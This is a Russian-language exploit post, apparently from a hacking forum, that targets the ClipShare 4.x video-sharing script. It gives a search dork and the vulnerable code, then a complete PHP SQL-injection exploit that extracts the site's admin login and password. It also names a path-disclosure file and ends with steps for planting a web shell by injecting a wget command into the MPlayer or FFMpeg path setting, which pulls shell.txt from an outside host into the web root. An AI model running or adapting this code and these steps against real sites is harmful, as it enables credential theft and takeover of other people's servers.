ClipShare
Version: 4.x(возможно более ранние версии)
Dork: Powered by ClipShare
Vendor: www.clip-share.com
Blind SQL Injection
File: share_video.php
PHP код:
...
$vkey = $_POST['v'];
$vkey = substr($vkey, 0, -4);
$query = "SELECT vkey FROM video WHERE VID='".$vkey."'";
...
$result = mysql_query($query) or die ('Query Error: ' . mysql_error());
...
Exploit
PHP код:
<?php
@error_reporting(0);
if(empty($argv[1]))
{
headerr();
die();
}
$url = trim($argv[1]);
if(!is_url($url))
{
xecho("Invalid URL!");
die();
}
xecho("Exploiting...");
$url = parse_url($url);
$path = !empty($url['path']) ? $url['path'] : '/';
$page = get($url['host'], 'admin_name', $path);
$login = parse($page);
$page = get($url['host'], 'admin_pass', $path);
$pass = parse($page);
xecho("[+] Success!");
xecho("Login: ".$login);
xecho("Password: ".$pass);
xecho("Default admin path: http://".$url['host']."/siteadmin/");
function headerr()
{
xecho(str_repeat("=", 53));
xecho("= ClipShare 4.x Blind SQL Injection 3xpl0it by ZIC".str_repeat(" ", 2)."=");
xecho("= Usage: exploit.php <target> <socks>".str_repeat(" ", 15)."=");
xecho("= Example: exploit.php http://victim.com".str_repeat(" ", 12)."=");
xecho(str_repeat("=", 53)."\n");
}
function xecho($in)
{
$out = "\n" . $in;
echo $out;
}
function get($url, $val, $path = '')
{
$fp = @fsockopen($url, 80);
$data = "emails=123%0D%0A&v=-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((SELECT svalue FROM sconfig WHERE soption='" . $val . "'), 1, 63), FLOOR(RAND(0)*2))) -- hack&config_file=&first_name=123&pers_message=%0D%0AThis+video+is+awesome%21%0D%0A%0D%0A";
$context = "POST " . $path . "/share_video.php HTTP/1.1\r\n";
$context .= "Host: " . $url . "\r\n";
$context .= "Content-Type: application/x-www-form-urlencoded\r\n";
$context .= "Content-Length: " . strlen($data) . "\r\n\r\n";
fputs($fp, $context);
fputs($fp, $data);
$page = '';
while($line = fgets($fp))
{
$page .= $line;
}
fclose($fp);
if($page) return $page;
else
{
xecho("[-] Error with getting target page!");
die();
}
}
function is_url($url)
{
return preg_match('|^http(s)?://[a-z0-9-]+(.[a-z0-9-]+)*(:[0-9]+)?(/.*)?$|i', $url);
}
function parse($page)
{
$tp = @explode('entry \'', $page, 2);
if(!is_array($tp))
{
xecho("[-] Error with parsing target page!");
die();
}
$tp = @explode('1\'', $tp[1], 2);
return $tp[0];
}
?>
Раскрытие путей
File: siteadmin/editor_files/INSTALL_HELP.php
Заливка шелла
1) Регаем юзера и подтверждаем email.
2) Заходим в админку(http://victim/siteadmin)
2) Переходим в раздел
Media Settings и смотрим, что используется в качестве
Thumbs Tool
3) Исходя из результата, изменяем соответствующее поле
MPlayer Path или
FFMpeg Path на
пример:
Цитата:
wget http://site.ru/shell.txt -O /var/www/host/shell.php #blablabla
|
4) Заливаем любое видео.
P.S. Благодарю
SynQ за этот пост -
POST